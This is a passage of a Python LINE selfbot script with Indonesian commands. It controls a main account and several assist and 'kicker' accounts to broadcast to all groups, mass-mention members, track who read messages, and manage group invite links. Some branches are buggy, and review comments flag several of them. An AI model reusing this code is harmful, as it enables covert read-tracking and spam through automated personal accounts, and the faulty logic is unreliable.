cl.sendVideoWithURL(msg.to, 'http://dl.profile.line.naver.jp'+str(mi.picturePath)+'/vp.small')
else:
cl.sendImageWithURL(msg.to, 'http://dl.profile.line.naver.jp'+str(mi.picturePath))
elif cmd == "mybot":
if wait["selfbot"] == True:
if msg._from in admin:
msg.contentType = 13
msg.contentMetadata = {'mid': mid}
cl.sendMessage1(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Amid}
cl.sendMessage1(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Bmid}
cl.sendMessage1(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Cmid}
cl.sendMessage1(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Zmid}
cl.sendMessage1(msg)
elif text.lower() == "hapus chat":
if wait["selfbot"] == True:
if msg._from in admin:
try:
cl.removeAllMessages(op.param2)
except:
pass
elif text.lower() == "remove chat":
if wait["selfbot"] == True:
if msg._from in admin:
try:
ki.removeAllMessages(op.param2)
kk.removeAllMessages(op.param2)
kc.removeAllMessages(op.param2)
cl.sendText(msg.to,"Chat dibersihkan...")
except:
pass
elif cmd.startswith("broadcast: "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
pesan = text.replace(sep[0] + " ","")
saya = cl.getGroupIdsJoined()
for group in saya:
cl.sendMessage(group,"[ Broadcast ]\n" + str(pesan))
elif text.lower() == "mykey":
# NOTE(review): the first three lines are the tail of a branch whose `elif` header is
# above this view (presumably a "mykey" command) — it reports the current command prefix.
if wait["selfbot"] == True:
if msg._from in admin:
cl.sendMessage(msg.to, "「Mykey」\nSetkey bot mu「 " + str(Setmain["keyCommand"]) + " 」")
# -- "setkey <key>": admin-only; change the bot command prefix (stored lowercased).
elif cmd.startswith("setkey "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
key = text.replace(sep[0] + " ","")
# Reject empty/whitespace-only keys.
if key in [""," ","\n",None]:
cl.sendMessage(msg.to, "Gagal mengganti key")
else:
Setmain["keyCommand"] = str(key).lower()
cl.sendMessage(msg.to, "「Setkey」\nSetkey diganti 「{}」".format(str(key).lower()))
# -- "resetkey": clear the command prefix back to the default (empty string).
elif text.lower() == "resetkey":
if wait["selfbot"] == True:
if msg._from in admin:
Setmain["keyCommand"] = ""
cl.sendMessage(msg.to, "「Setkey」\nSetkey mu kembali ke awal")
# -- "restart": remember the chat to announce in, then restart the bot process.
elif cmd == "restart":
if wait["selfbot"] == True:
if msg._from in admin:
cl.sendMessage(msg.to, "Sabar bos..")
Setmain["restartPoint"] = msg.to
restartBot()
cl.sendMessage(msg.to, "Sudah bos...")
# -- "runtime": report uptime since `mulai` (epoch seconds), formatted by waktu().
elif cmd == "runtime":
if wait["selfbot"] == True:
if msg._from in admin:
eltime = time.time() - mulai
bot = "Aktif " +waktu(eltime)
cl.sendMessage(msg.to,bot)
# -- "ginfo": summary of the current group (name, creator, member/pending counts,
#    QR/ticket state), plus the creator's contact card and the group picture.
elif cmd == "ginfo":
if msg._from in admin:
try:
G = cl.getGroup(msg.to)
if G.invitee is None:
gPending = "0"
else:
gPending = str(len(G.invitee))
# preventedJoinByTicket == True means the join-by-link (QR) feature is closed.
if G.preventedJoinByTicket == True:
gQr = "Tertutup"
gTicket = "Tidak ada"
else:
gQr = "Terbuka"
gTicket = "https://line.me/R/ti/g/{}".format(str(cl.reissueGroupTicket(G.id)))
timeCreated = []
# createdTime is in milliseconds since epoch.
timeCreated.append(time.strftime("%d-%m-%Y [ %H:%M:%S ]", time.localtime(int(G.createdTime) / 1000)))
cl.sendMessage(msg.to, "™↔CxB Group Info\n\n™↔ Nama Group : {}".format(G.name)+ "\n™↔ ID Group : {}".format(G.id)+ "\n™↔ Pembuat : {}".format(G.creator.displayName)+ "\n™↔ Waktu Dibuat : {}".format(str(timeCreated))+ "\n™↔ Jumlah Member : {}".format(str(len(G.members)))+ "\n™↔ Jumlah Pending : {}".format(gPending)+ "\n™↔ Group Qr : {}".format(gQr)+ "\n™↔ Group Ticket : {}".format(gTicket))
# contentType 13 = contact card message.
cl.sendMessage(msg.to, None, contentMetadata={'mid': G.creator.mid}, contentType=13)
cl.sendImageWithURL(msg.to, 'http://dl.profile.line-cdn.net/'+G.pictureStatus)
except Exception as e:
cl.sendMessage(msg.to, str(e))
# -- "infogrup <n>": same summary for the n-th joined group (1-based index).
elif cmd.startswith("infogrup "):
if msg._from in admin:
separate = text.split(" ")
number = text.replace(separate[0] + " ","")
groups = cl.getGroupIdsJoined()
ret_ = ""
try:
group = groups[int(number)-1]
G = cl.getGroup(group)
try:
gCreator = G.creator.displayName
except:
gCreator = "Tidak ditemukan"
if G.invitee is None:
gPending = "0"
else:
gPending = str(len(G.invitee))
if G.preventedJoinByTicket == True:
gQr = "Tertutup"
gTicket = "Tidak ada"
else:
gQr = "Terbuka"
gTicket = "https://line.me/R/ti/g/{}".format(str(cl.reissueGroupTicket(G.id)))
timeCreated = []
timeCreated.append(time.strftime("%d-%m-%Y [ %H:%M:%S ]", time.localtime(int(G.createdTime) / 1000)))
ret_ += "™↔ CxB team Grup Info\n"
ret_ += "\n™↔ Nama Group : {}".format(G.name)
ret_ += "\n™↔ ID Group : {}".format(G.id)
ret_ += "\n™↔ Pembuat : {}".format(gCreator)
ret_ += "\n™↔ Waktu Dibuat : {}".format(str(timeCreated))
ret_ += "\n™↔ Jumlah Member : {}".format(str(len(G.members)))
ret_ += "\n™↔ Jumlah Pending : {}".format(gPending)
ret_ += "\n™↔ Group Qr : {}".format(gQr)
ret_ += "\n™↔ Group Ticket : {}".format(gTicket)
ret_ += ""
# NOTE(review): sends to `to`, not `msg.to` — presumably `to = msg.to` earlier
# in the handler; confirm, otherwise this replies to the wrong target.
cl.sendMessage(to, str(ret_))
except:
pass
# -- "infomem <n>": list the display names of all members of the n-th joined group.
elif cmd.startswith("infomem "):
if msg._from in admin:
separate = msg.text.split(" ")
number = msg.text.replace(separate[0] + " ","")
groups = cl.getGroupIdsJoined()
ret_ = ""
try:
group = groups[int(number)-1]
G = cl.getGroup(group)
no = 0
ret_ = ""
for mem in G.members:
no += 1
ret_ += "\n " "™↔ "+ str(no) + ". " + mem.displayName
# NOTE(review): `to` again instead of `msg.to` — verify against the caller.
cl.sendMessage(to,"™↔ Group Name : [ " + str(G.name) + " ]\n\n [ List Member ]\n" + ret_ + "\n\n「Total %i Members」" % len(G.members))
except:
pass
# -- "leave: <n>": make all assist bots leave the n-th joined group.
elif cmd.startswith("leave: "):
if msg._from in admin:
separate = msg.text.split(" ")
number = msg.text.replace(separate[0] + " ","")
groups = cl.getGroupIdsJoined()
group = groups[int(number)-1]
# NOTE(review): `group` is a group-id string, so this loop iterates its
# characters and `cl.getGroup(i)` is called with single characters; the
# `ginfo == group` comparison (Group object vs. string) can never match.
# This branch looks broken — confirm intent before relying on it.
for i in group:
ginfo = cl.getGroup(i)
if ginfo == group:
ki.leaveGroup(i)
kk.leaveGroup(i)
kc.leaveGroup(i)
km.leaveGroup(i)
kb.leaveGroup(i)
kd.leaveGroup(i)
ke.leaveGroup(i)
kf.leaveGroup(i)
kg.leaveGroup(i)
kh.leaveGroup(i)
cl.sendMessage(msg.to,"Berhasil keluar di grup " +str(ginfo.name))
# -- "fiendlist" (sic — command string is a typo for "friendlist" but must stay
#    as-is, it is the runtime trigger): numbered list of all contacts.
elif cmd == "fiendlist":
if wait["selfbot"] == True:
if msg._from in admin:
ma = ""
a = 0
gid = cl.getAllContactIds()
for i in gid:
G = cl.getContact(i)
a = a + 1
end = "\n"
ma += "╠ " + str(a) + ". " +G.displayName+ "\n"
cl.sendMessage(msg.to,"╔══[ FRIEND LIST ]\n║\n"+ma+"║\n╚══[ Total「"+str(len(gid))+"」Friends ]")
# -- "gruplist": numbered list of groups the main account has joined.
elif cmd == "gruplist":
if wait["selfbot"] == True:
if msg._from in admin:
ma = ""
a = 0
gid = cl.getGroupIdsJoined()
for i in gid:
G = cl.getGroup(i)
a = a + 1
end = "\n"
ma += "╠ " + str(a) + ". " +G.name+ "\n"
cl.sendMessage(msg.to,"╔══[ GROUP LIST ]\n║\n"+ma+"║\n╚══[ Total「"+str(len(gid))+"」Groups ]")
# -- "gruplist1"/"gruplist2"/"gruplist3": same listing for assist bots ki/kk/kc.
elif cmd == "gruplist1":
if msg._from in admin:
ma = ""
a = 0
gid = ki.getGroupIdsJoined()
for i in gid:
G = ki.getGroup(i)
a = a + 1
end = "\n"
ma += "╠ " + str(a) + ". " +G.name+ "\n"
ki.sendMessage(msg.to,"╔══[ GROUP LIST ]\n║\n"+ma+"║\n╚══[ Total「"+str(len(gid))+"」Groups ]")
elif cmd == "gruplist2":
if msg._from in admin:
ma = ""
a = 0
gid = kk.getGroupIdsJoined()
for i in gid:
G = kk.getGroup(i)
a = a + 1
end = "\n"
ma += "╠ " + str(a) + ". " +G.name+ "\n"
kk.sendMessage(msg.to,"╔══[ GROUP LIST ]\n║\n"+ma+"║\n╚══[ Total「"+str(len(gid))+"」Groups ]")
elif cmd == "gruplist3":
if msg._from in admin:
ma = ""
a = 0
gid = kc.getGroupIdsJoined()
for i in gid:
G = kc.getGroup(i)
a = a + 1
end = "\n"
ma += "╠ " + str(a) + ". " +G.name+ "\n"
kc.sendMessage(msg.to,"╔══[ GROUP LIST ]\n║\n"+ma+"║\n╚══[ Total「"+str(len(gid))+"」Groups ]")
# -- "open"/"close": toggle the group's join-by-link flag (toType 2 = group chat).
elif cmd == "open":
if wait["selfbot"] == True:
if msg._from in admin:
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.preventedJoinByTicket = False
cl.updateGroup(X)
cl.sendMessage(msg.to, "Url Opened")
elif cmd == "close":
if wait["selfbot"] == True:
if msg._from in admin:
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.preventedJoinByTicket = True
cl.updateGroup(X)
cl.sendMessage(msg.to, "Url Closed")
# -- "url grup": force-open join-by-link if needed, then post the invite URL.
#    NOTE(review): leaves the group opened as a side effect — confirm intended.
elif cmd == "url grup":
if wait["selfbot"] == True:
if msg._from in admin:
if msg.toType == 2:
x = cl.getGroup(msg.to)
if x.preventedJoinByTicket == True:
x.preventedJoinByTicket = False
cl.updateGroup(x)
gurl = cl.reissueGroupTicket(msg.to)
cl.sendMessage(msg.to, "Nama : "+str(x.name)+ "\nUrl grup : http://line.me/R/ti/g/"+gurl)
#===========BOT UPDATE============#
# -- picture-update commands: arm a flag so the NEXT image message sent to the
#    chat is consumed elsewhere in the handler as the new group/profile picture.
elif cmd == "updategrup":
if wait["selfbot"] == True:
if msg._from in admin:
if msg.toType == 2:
settings["groupPicture"] = True
cl.sendText(msg.to,"Kirim fotonya.....")
elif cmd == "updatebot":
if wait["selfbot"] == True:
if msg._from in admin:
settings["changePicture"] = True
cl.sendText(msg.to,"Kirim fotonya.....")
elif cmd == "updatefoto":
if wait["selfbot"] == True:
if msg._from in admin:
Setmain["RAfoto"][mid] = True
cl.sendText(msg.to,"Kirim fotonya.....")
elif cmd == "bot1up":
if msg._from in admin:
Setmain["RAfoto"][Amid] = True
ki.sendText(msg.to,"Kirim fotonya.....")
elif cmd == "bot2up":
if msg._from in admin:
Setmain["RAfoto"][Bmid] = True
kk.sendText(msg.to,"Kirim fotonya.....")
elif cmd == "bot3up":
if msg._from in admin:
Setmain["RAfoto"][Cmid] = True
kc.sendText(msg.to,"Kirim fotonya.....")
elif cmd == "bot4up":
if msg._from in admin:
Setmain["RAfoto"][Zmid] = True
sw.sendText(msg.to,"Kirim fotonya.....")
# -- "myname:"/"botNname:"/"botkicker:": rename an account's profile.
#    NOTE(review): the `<= 10000000000` length guard is effectively a no-op.
elif cmd.startswith("myname: "):
if msg._from in admin:
separate = msg.text.split(" ")
string = msg.text.replace(separate[0] + " ","")
if len(string) <= 10000000000:
profile = cl.getProfile()
profile.displayName = string
cl.updateProfile(profile)
cl.sendMessage(msg.to,"Nama diganti jadi " + string + "")
elif cmd.startswith("bot1name: "):
if msg._from in admin:
separate = msg.text.split(" ")
string = msg.text.replace(separate[0] + " ","")
if len(string) <= 10000000000:
profile = ki.getProfile()
profile.displayName = string
ki.updateProfile(profile)
ki.sendMessage(msg.to,"Nama diganti jadi " + string + "")
elif cmd.startswith("bot2name: "):
if msg._from in admin:
separate = msg.text.split(" ")
string = msg.text.replace(separate[0] + " ","")
if len(string) <= 10000000000:
profile = kk.getProfile()
profile.displayName = string
kk.updateProfile(profile)
kk.sendMessage(msg.to,"Nama diganti jadi " + string + "")
elif cmd.startswith("bot3name: "):
if msg._from in admin:
separate = msg.text.split(" ")
string = msg.text.replace(separate[0] + " ","")
if len(string) <= 10000000000:
profile = kc.getProfile()
profile.displayName = string
kc.updateProfile(profile)
kc.sendMessage(msg.to,"Nama diganti jadi " + string + "")
elif cmd.startswith("botkicker: "):
if msg._from in admin:
separate = msg.text.split(" ")
string = msg.text.replace(separate[0] + " ","")
if len(string) <= 10000000000:
profile = sw.getProfile()
profile.displayName = string
sw.updateProfile(profile)
sw.sendMessage(msg.to,"Nama diganti jadi " + string + "")
#===========BOT UPDATE============#
elif cmd == "tagall" or text.lower() == '😆':
if wait["selfbot"] == True:
if msg._from in admin:
group = cl.getGroup(msg.to)
nama = [contact.mid for contact in group.members]
nm1, nm2, nm3, nm4, jml = [], [], [], [], len(nama)
if jml <= 100:
mentionMembers(msg.to, nama)
if jml > 100 and jml < 200:
for i in range (0, 99):
nm1 += [nama[i]]
mentionMembers(msg.to, nm1)
for j in range (100, len(nama)-1):
nm2 += [nama[j]]
mentionMembers(msg.to, nm2)
if jml > 200 and jml < 300:
for i in range (0, 99):
nm1 += [nama[i]]
mentionMembers(msg.to, nm1)
for j in range (100, 199):
nm2 += [nama[j]]
mentionMembers(msg.to, nm2)
for k in range (200, len(nama)-1):
nm3 += [nama[k]]
mentionMembers(msg.to, nm3)
if jml > 300 and jml < 400:
for i in range (0, 99):
nm1 += [nama[i]]
mentionMembers(msg.to, nm1)
for j in range (100, 199):
nm2 += [nama[j]]
mentionMembers(msg.to, nm2)
for k in range (200, 299):
nm3 += [nama[k]]
mentionMembers(msg.to, nm3)
for l in range (300, len(nama)-1):
nm4 += [nama[l]]
mentionMembers(msg.to, nm4)
if jml > 400 and jml < 500:
for i in range (0, 99):
nm1 += [nama[i]]
mentionMembers(msg.to, nm1)
for j in range (100, 199):
nm2 += [nama[j]]
mentionMembers(msg.to, nm2)
for k in range (200, 299):
nm3 += [nama[k]]
mentionMembers(msg.to, nm3)
for l in range (300, 399):
nm4 += [nama[l]]
mentionMembers(msg.to, nm4)
for m in range (400, len(nama)-1):
nm5 += [nama[m]]
mentionMembers(msg.to, nm5)
# -- "listbot": numbered list of bot accounts (mids in `Bots`) by display name.
elif cmd == "listbot":
if wait["selfbot"] == True:
if msg._from in admin:
ma = ""
a = 0
for m_id in Bots:
a = a + 1
end = '\n'
ma += str(a) + ". " +cl.getContact(m_id).displayName + "\n"
cl.sendMessage(msg.to,"™↔ CxB bots\n\n"+ma+"\nTotal「%s」CxB bots" %(str(len(Bots))))
# -- "listadmin": owners, admins and staff, each as a numbered name list.
elif cmd == "listadmin":
if wait["selfbot"] == True:
if msg._from in admin:
ma = ""
mb = ""
mc = ""
a = 0
b = 0
c = 0
for m_id in owner:
a = a + 1
end = '\n'
ma += str(a) + ". " +cl.getContact(m_id).displayName + "\n"
for m_id in admin:
b = b + 1
end = '\n'
mb += str(b) + ". " +cl.getContact(m_id).displayName + "\n"
for m_id in staff:
c = c + 1
end = '\n'
mc += str(c) + ". " +cl.getContact(m_id).displayName + "\n"
cl.sendMessage(msg.to,"™↔ CxB admin\n\nOwner:\n"+ma+"\nAdmin:\n"+mb+"\nStaff:\n"+mc+"\nTotal「%s」CxB team" %(str(len(owner)+len(admin)+len(staff))))
# -- "listprotect": group names currently in each protection set
#    (protectqr / protectkick / protectjoin / protectcancel).
elif cmd == "listprotect":
if wait["selfbot"] == True:
if msg._from in admin:
ma = ""
mb = ""
mc = ""
md = ""
a = 0
b = 0
c = 0
d = 0
gid = protectqr
for group in gid:
a = a + 1
end = '\n'
ma += str(a) + ". " +cl.getGroup(group).name + "\n"
gid = protectkick
for group in gid:
b = b + 1
end = '\n'
mb += str(b) + ". " +cl.getGroup(group).name + "\n"
gid = protectjoin
for group in gid:
d = d + 1
end = '\n'
md += str(d) + ". " +cl.getGroup(group).name + "\n"
gid = protectcancel
for group in gid:
c = c + 1
end = '\n'
mc += str(c) + ". " +cl.getGroup(group).name + "\n"
cl.sendMessage(msg.to,"™↔ CxB team Protection\n\n™↔ Protect Url :\n"+ma+"\n™↔ Protect Kick:\n"+mb+"\n™↔ protect Join:\n"+md+"\n™↔ Protect Cancel:\n"+mc+"\nTotal「%s」Grup protect" %(str(len(protectqr)+len(protectkick)+len(protectjoin)+len(protectcancel))))
# -- "respon": each assist bot announces its response name (liveness check).
elif cmd == "respon":
if wait["selfbot"] == True:
if msg._from in admin:
ki.sendMessage(msg.to,responsename1)
kk.sendMessage(msg.to,responsename2)
kc.sendMessage(msg.to,responsename3)
# -- "invitebot": invite the three assist accounts and have them accept.
elif cmd == "invitebot":
if wait["selfbot"] == True:
if msg._from in admin:
try:
anggota = [Bmid,Cmid,Amid]
cl.inviteIntoGroup(msg.to, anggota)
kk.acceptGroupInvitation(msg.to)
kc.acceptGroupInvitation(msg.to)
ki.acceptGroupInvitation(msg.to)
except:
pass
# -- "joinall": temporarily open the group link, join all assist bots via a
#    fresh ticket, then close the link again.
elif cmd == "joinall":
if wait["selfbot"] == True:
if msg._from in admin:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventedJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki.acceptGroupInvitationByTicket(msg.to,Ticket)
kk.acceptGroupInvitationByTicket(msg.to,Ticket)
kc.acceptGroupInvitationByTicket(msg.to,Ticket)
G = kc.getGroup(msg.to)
G.preventedJoinByTicket = True
kc.updateGroup(G)
# -- "byeall": assist bots say goodbye and leave the current group.
elif cmd == "byeall":
if wait["selfbot"] == True:
if msg._from in admin:
G = cl.getGroup(msg.to)
ki.sendText(msg.to, "Bye bye fams "+str(G.name))
ki.leaveGroup(msg.to)
kk.leaveGroup(msg.to)
kc.leaveGroup(msg.to)
# -- "byeme": main account leaves the current group.
elif cmd == "byeme":
if wait["selfbot"] == True:
if msg._from in admin:
G = cl.getGroup(msg.to)
cl.sendText(msg.to, "Bye bye fams "+str(G.name))
cl.leaveGroup(msg.to)
# -- "leave <group name>": assist bots leave every joined group whose name
#    matches exactly.
elif cmd.startswith("leave "):
if msg._from in admin:
proses = text.split(" ")
ng = text.replace(proses[0] + " ","")
gid = cl.getGroupIdsJoined()
for i in gid:
h = cl.getGroup(i).name
if h == ng:
ki.sendMessage(i, "Silahkan admin invite atau masukan kembali")
ki.leaveGroup(i)
kk.leaveGroup(i)
kc.leaveGroup(i)
# NOTE(review): replies to `to`, not `msg.to` — verify `to` is set upstream.
cl.sendMessage(to,"Berhasil keluar dari grup " +h)
# -- "assist1"/"assist2"/"assist3": open the link, join ONE assist bot by
#    ticket, then close the link (same dance as "joinall" for a single bot).
elif cmd == "assist1":
if msg._from in admin:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventedJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki.acceptGroupInvitationByTicket(msg.to,Ticket)
G = ki.getGroup(msg.to)
G.preventedJoinByTicket = True
ki.updateGroup(G)
elif cmd == "assist2":
if msg._from in admin:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventedJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
kk.acceptGroupInvitationByTicket(msg.to,Ticket)
G = kk.getGroup(msg.to)
G.preventedJoinByTicket = True
kk.updateGroup(G)
elif cmd == "assist3":
if msg._from in admin:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventedJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
kc.acceptGroupInvitationByTicket(msg.to,Ticket)
G = kc.getGroup(msg.to)
G.preventedJoinByTicket = True
kc.updateGroup(G)
# -- "kicker join"/"kicker bye": same join/leave dance for the kicker account `sw`.
elif cmd == "kicker join":
if msg._from in admin:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventedJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
sw.acceptGroupInvitationByTicket(msg.to,Ticket)
G = sw.getGroup(msg.to)
G.preventedJoinByTicket = True
sw.updateGroup(G)
elif cmd == "kicker bye":
if msg._from in admin:
G = cl.getGroup(msg.to)
sw.leaveGroup(msg.to)
# -- "sprespon": time three representative API calls and report each (divided
#    by 3 — presumably an averaging convention; the calls are made only once).
elif cmd == "sprespon":
if wait["selfbot"] == True:
if msg._from in admin:
get_profile_time_start = time.time()
get_profile = cl.getProfile()
get_profile_time = time.time() - get_profile_time_start
get_group_time_start = time.time()
get_group = cl.getGroupIdsJoined()
get_group_time = time.time() - get_group_time_start
get_contact_time_start = time.time()
get_contact = cl.getContact(mid)
get_contact_time = time.time() - get_contact_time_start
cl.sendMessage(msg.to, "™↔ CxB Speed respon\n\n - Get Profile\n %.10f\n - Get Contact\n %.10f\n - Get Group\n %.10f" % (get_profile_time/3,get_contact_time/3,get_group_time/3))
# -- "speed"/"sp": round-trip time of a single sendMessage call.
elif cmd == "speed" or cmd == "sp":
if wait["selfbot"] == True:
if msg._from in admin:
start = time.time()
cl.sendMessage(msg.to, "Progres speed...")
elapsed_time = time.time() - start
cl.sendMessage(msg.to, "{} detik".format(str(elapsed_time)))
# -- "lurking on": start tracking read receipts from this message onward.
elif cmd == "lurking on":
if wait["selfbot"] == True:
if msg._from in admin:
tz = pytz.timezone("Asia/Jakarta")
timeNow = datetime.now(tz=tz)
# NOTE(review): uses `msg_id` here but `msg.id` in the "lurkers" reset
# below — confirm both names refer to the same message id upstream.
Setmain['RAreadPoint'][msg.to] = msg_id
Setmain['RAreadMember'][msg.to] = {}
cl.sendText(msg.to, "Lurking berhasil diaktifkan\n\nTanggal : "+ datetime.strftime(timeNow,'%Y-%m-%d')+"\nJam [ "+ datetime.strftime(timeNow,'%H:%M:%S')+" ]")
# -- "lurking off": stop tracking and discard collected state.
#    NOTE(review): raises KeyError (unhandled) if lurking was never enabled.
elif cmd == "lurking off":
if wait["selfbot"] == True:
if msg._from in admin:
tz = pytz.timezone("Asia/Jakarta")
timeNow = datetime.now(tz=tz)
del Setmain['RAreadPoint'][msg.to]
del Setmain['RAreadMember'][msg.to]
cl.sendText(msg.to, "Lurking berhasil dinoaktifkan\n\nTanggal : "+ datetime.strftime(timeNow,'%Y-%m-%d')+"\nJam [ "+ datetime.strftime(timeNow,'%H:%M:%S')+" ]")
# -- "lurkers": report everyone who read since "lurking on" as an @-mention
#    list (built via the MENTION contentMetadata payload), then reset tracking.
elif cmd == "lurkers":
if msg._from in admin:
if msg.to in Setmain['RAreadPoint']:
if Setmain['RAreadMember'][msg.to] != {}:
aa = []
for x in Setmain['RAreadMember'][msg.to]:
aa.append(x)
try:
arrData = ""
textx = " [ Result {} member ] \n\n [ Lurkers ]\n1. ".format(str(len(aa)))
arr = []
no = 1
b = 1
for i in aa:
b = b + 1
end = "\n"
mention = "@x\n"
# S/E are the character offsets of the mention placeholder
# inside the final text; M is the mentioned member's mid.
slen = str(len(textx))
elen = str(len(textx) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':i}
arr.append(arrData)
tz = pytz.timezone("Asia/Jakarta")
timeNow = datetime.now(tz=tz)
textx += mention
if no < len(aa):
no += 1
textx += str(b) + ". "
else:
try:
no = "[ {} ]".format(str(cl.getGroup(msg.to).name))
except:
no = " "
msg.to = msg.to
msg.text = textx+"\nTanggal : "+ datetime.strftime(timeNow,'%Y-%m-%d')+"\nJam [ "+ datetime.strftime(timeNow,'%H:%M:%S')+" ]"
msg.contentMetadata = {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}
msg.contentType = 0
cl.sendMessage1(msg)
except:
pass
# Reset the tracking point so a fresh lurker window begins here.
try:
del Setmain['RAreadPoint'][msg.to]
del Setmain['RAreadMember'][msg.to]
except:
pass
Setmain['RAreadPoint'][msg.to] = msg.id
Setmain['RAreadMember'][msg.to] = {}
else:
cl.sendText(msg.to, "User kosong...")
else:
cl.sendText(msg.to, "Ketik lurking on dulu")
# -- "sider on": enable the read-receipt ("sider") watcher for this chat.
elif cmd == "sider on":
if wait["selfbot"] == True:
if msg._from in admin:
try:
tz = pytz.timezone("Asia/Jakarta")
timeNow = datetime.now(tz=tz)
cl.sendMessage(msg.to, "Cek sider diaktifkan\n\nTanggal : "+ datetime.strftime(timeNow,'%Y-%m-%d')+"\nJam [ "+ datetime.strftime(timeNow,'%H:%M:%S')+" ]")
del cctv['point'][msg.to]
del cctv['sidermem'][msg.to]
del cctv['cyduk'][msg.to]
except:
pass
cctv['point'][msg.to] = msg.id
cctv['sidermem'][msg.to] = ""
cctv['cyduk'][msg.to]=True
# -- "sider off": disable the watcher (flag only; state is kept).
elif cmd == "sider off":
if wait["selfbot"] == True:
if msg._from in admin:
if msg.to in cctv['point']:
tz = pytz.timezone("Asia/Jakarta")
timeNow = datetime.now(tz=tz)
cctv['cyduk'][msg.to]=False
cl.sendMessage(msg.to, "Cek sider dinonaktifkan\n\nTanggal : "+ datetime.strftime(timeNow,'%Y-%m-%d')+"\nJam [ "+ datetime.strftime(timeNow,'%H:%M:%S')+" ]")
else:
cl.sendMessage(msg.to, "Sudak tidak aktif")
#===========Hiburan============#
# -- "sholat: <city>": prayer-schedule lookup via an external API; replies only
#    when all five times are populated.
elif cmd.startswith("sholat: "):
if msg._from in admin:
sep = text.split(" ")
location = text.replace(sep[0] + " ","")
with requests.session() as web:
web.headers["user-agent"] = random.choice(settings["userAgent"])
r = web.get("http://api.corrykalam.net/apisholat.php?lokasi={}".format(urllib.parse.quote(location)))
data = r.text
data = json.loads(data)
tz = pytz.timezone("Asia/Jakarta")
timeNow = datetime.now(tz=tz)
if data[1] != "Subuh : " and data[2] != "Dzuhur : " and data[3] != "Ashar : " and data[4] != "Maghrib : " and data[5] != "Isha : ":
ret_ = "「Jadwal Sholat」"
ret_ += "\n™↔ Lokasi : " + data[0]
ret_ += "\n™↔ " + data[1]
ret_ += "\n™↔ " + data[2]
ret_ += "\n™↔ " + data[3]
ret_ += "\n™↔ " + data[4]
ret_ += "\n™↔ " + data[5]
ret_ += "\n\nTanggal : " + datetime.strftime(timeNow,'%Y-%m-%d')
ret_ += "\nJam : " + datetime.strftime(timeNow,'%H:%M:%S')
cl.sendMessage(msg.to, str(ret_))
# -- "cuaca: <city>": weather lookup via an external API.
elif cmd.startswith("cuaca: "):
if msg._from in admin:
separate = text.split(" ")
location = text.replace(separate[0] + " ","")
with requests.session() as web:
web.headers["user-agent"] = random.choice(settings["userAgent"])
r = web.get("http://api.corrykalam.net/apicuaca.php?kota={}".format(urllib.parse.quote(location)))
data = r.text
data = json.loads(data)
tz = pytz.timezone("Asia/Jakarta")
timeNow = datetime.now(tz=tz)
if "result" not in data:
ret_ = "「Status Cuaca」"
ret_ += "\n™↔ Lokasi : " + data[0].replace("Temperatur di kota ","")
ret_ += "\n™↔ Suhu : " + data[1].replace("Suhu : ","") + " C"
ret_ += "\n™↔ Kelembaban : " + data[2].replace("Kelembaban : ","") + " %"
ret_ += "\n™↔ Tekanan udara : " + data[3].replace("Tekanan udara : ","") + " HPa"
ret_ += "\n™↔ Kecepatan angin : " + data[4].replace("Kecepatan angin : ","") + " m/s"
ret_ += "\n\nTanggal : " + datetime.strftime(timeNow,'%Y-%m-%d')
ret_ += "\nJam : " + datetime.strftime(timeNow,'%H:%M:%S')
cl.sendMessage(msg.to, str(ret_))
# -- "lokasi: <place>": geocode a place and reply with a Google Maps link.
elif cmd.startswith("lokasi: "):
if msg._from in admin:
separate = msg.text.split(" ")
location = msg.text.replace(separate[0] + " ","")
with requests.session() as web:
web.headers["user-agent"] = random.choice(settings["userAgent"])
r = web.get("http://api.corrykalam.net/apiloc.php?lokasi={}".format(urllib.parse.quote(location)))
data = r.text
data = json.loads(data)
if data[0] != "" and data[1] != "" and data[2] != "":
link = "https://www.google.co.id/maps/@{},{},15z".format(str(data[1]), str(data[2]))
ret_ = "「Info Lokasi」"
ret_ += "\n™↔ Location : " + data[0]
ret_ += "\n™↔ Google Maps : " + link
else:
ret_ = "[Details Location] Error : Location not found"
cl.sendMessage(msg.to,str(ret_))
# -- "lirik: <song>": fetch lyrics from the joox proxy API; strips the LRC
#    timestamp/tag markup before sending.
elif cmd.startswith("lirik: "):
if msg._from in admin:
sep = msg.text.split(" ")
search = msg.text.replace(sep[0] + " ","")
params = {'songname': search}
with requests.session() as web:
web.headers["User-Agent"] = random.choice(settings["userAgent"])
r = web.get("https://ide.fdlrcn.com/workspace/yumi-apis/joox?{}".format(urllib.parse.urlencode(params)))
try:
data = json.loads(r.text)
for song in data:
songs = song[5]
lyric = songs.replace('ti:','Title - ')
lyric = lyric.replace('ar:','Artist - ')
lyric = lyric.replace('al:','Album - ')
# Strip LRC timing characters (digits, dot, colon) one at a time.
removeString = "[1234567890.:]"
for char in removeString:
lyric = lyric.replace(char,'')
ret_ = "╔══[ Lyric ]"
ret_ += "\n╠ Nama lagu : {}".format(str(song[0]))
ret_ += "\n╠ Durasi : {}".format(str(song[1]))
ret_ += "\n╠ Link : {}".format(str(song[3]))
ret_ += "\n╚══[ Finish ]\n\nLirik nya :\n{}".format(str(lyric))
